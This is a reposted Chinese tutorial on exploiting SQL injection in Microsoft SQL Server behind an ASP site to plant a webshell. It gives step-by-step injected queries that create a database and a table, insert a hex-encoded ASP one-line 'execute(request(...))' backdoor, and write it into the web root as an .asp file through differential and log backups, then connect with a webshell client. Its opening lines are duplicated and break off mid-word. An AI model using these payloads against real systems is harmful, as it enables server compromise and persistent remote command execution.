大哥带的mssql注入拿下shell
发布时间:2023-03-13 11:10:12 所属栏目:MsSql教程 来源:
导读:路径的爆破
0X01判断 是否为判断当前数据库用户名是否为DB_OWNER:
Mssql拿shell有两种方法 win2008sever里面
0X02数据库备份拿shell
0X001 创建自己的数据库
;create%20database%20zhong;
0X002先
0X01判断 是否为判断当前数据库用户名是否为DB_OWNER:
Mssql拿shell有两种方法 win2008sever里面
0X02数据库备份拿shell
0X001 创建自己的数据库
;create%20database%20zhong;
0X002先
|
路径的爆破 0X01判断 是否为判断当前数据库用户名是否为DB_OWNER: Mssql拿shell有两种方法 win2008sever里面 0X02数据库备份拿shell 0X001 创建自己的数据库 ;create%20database%20zhong; 0X002先进行一次完整备份: ?id=1;backup database zhong to disk = 'E:\wwwroot\asp_sqli'; 0X003使用数据库: ;use%20zhong; 0x004创建新表:在数据库名为中的库里面创建一个新的cmd表 create table [dbo].[zhong] ([cmd] [image]); 0X006向cmd表中插入数据 ?id=1;insert into zhong(cmd) values(0x3C25657865637574652872657175657374282276616C7565222929253E); 0X007进行数据库的差异备份 ?id=1;backup database zhong to disk='E:\wwwroot\asp_sqli\zhongqzi.asp' WITH DIFFERENTIAL,FORMAT; 然后菜刀连接 0X03log备份拿shell 0X001 激活为还原模式 这里要注意的是我们通过备份拿shell 要注意是需要进行数据库的 LOG备份需要先把指定的数据库激活为还原模式,所以需要执行alter database XXX set RECOVERY FUL,而差异备份不需要,所以只有这条语句的就是LOG备份 ?id=1;alter database asp_test set RECOVERY FULL – 0X002创建新的表cmd ?id=1;create table cmd (a image) – 0X003备份当前库的log到网站根目录 ?id=1;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhong.asp' with init – 0X004在cmd表的a列中插入一句话 insert into cmd (a) values ('<%%25Execute(request("go"))% %25>')-- 0X005备份差异log ;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhongqi.asp' -- (编辑:汽车网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
推荐文章
站长推荐